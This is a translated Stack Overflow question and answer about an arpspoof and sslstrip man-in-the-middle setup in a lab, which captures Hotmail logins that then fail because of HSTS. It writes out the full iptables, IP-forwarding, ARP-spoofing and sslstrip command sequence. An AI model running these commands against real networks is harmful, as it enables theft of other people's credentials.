我正在使用 arpspoof/sslstrip 分析我的虚拟实验室的流量。
我正在使用以下脚本
iptables -A INPUT -i eth1 -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -i eth1 -p tcp --dport 8080 -j ACCEPT
iptables -A PREROUTING -t nat -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080
echo '1' > /proc/sys/net/ipv4/ip_forward
-- 10.10.10.2 目标
-- 10.10.10.1 路由器
arpspoof -i eth1 -t 10.10.10.2 10.10.10.1
arpspoof -i eth1 -t 10.10.10.1 10.10.10.2
sslstrip -l 8080
这项工作部分有效,因为我可以很好地获取 sslstrip.log 文件中的信息。 问题是 PC 目标(Win7 64 位 IE 11)无法成功完成登录过程。
发生的事情是:
- 在我写的目标 PC 上 https://hotmail.com.ar
- 它被重定向到 http://hotmail.com.ar
- 我输入用户名和密码
- 信息正确保存在 sslstrip.log 中
- 但是在确认之后,浏览器重新加载页面而没有实际登录
似乎是什么问题?
谢谢
最佳答案
我知道这个问题已经存在两年多了,您可能已经找到了解决方案。我在对 Hotmail 的研究中尝试了相同的场景并遇到了同样的问题。
我认为这个问题的答案是 Hotmail 使用 HTTP 严格传输安全 (HSTS) 进行身份验证,它只允许服务器使用 HTTPS 连接。不确定 我不知道为什么 Hotmail 不使用 HSTS 来输入用户名和密码,而只用于身份验证。
希望能帮到你
关于linux - SSLStrip 部分工作(不在现场登录),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/24220544/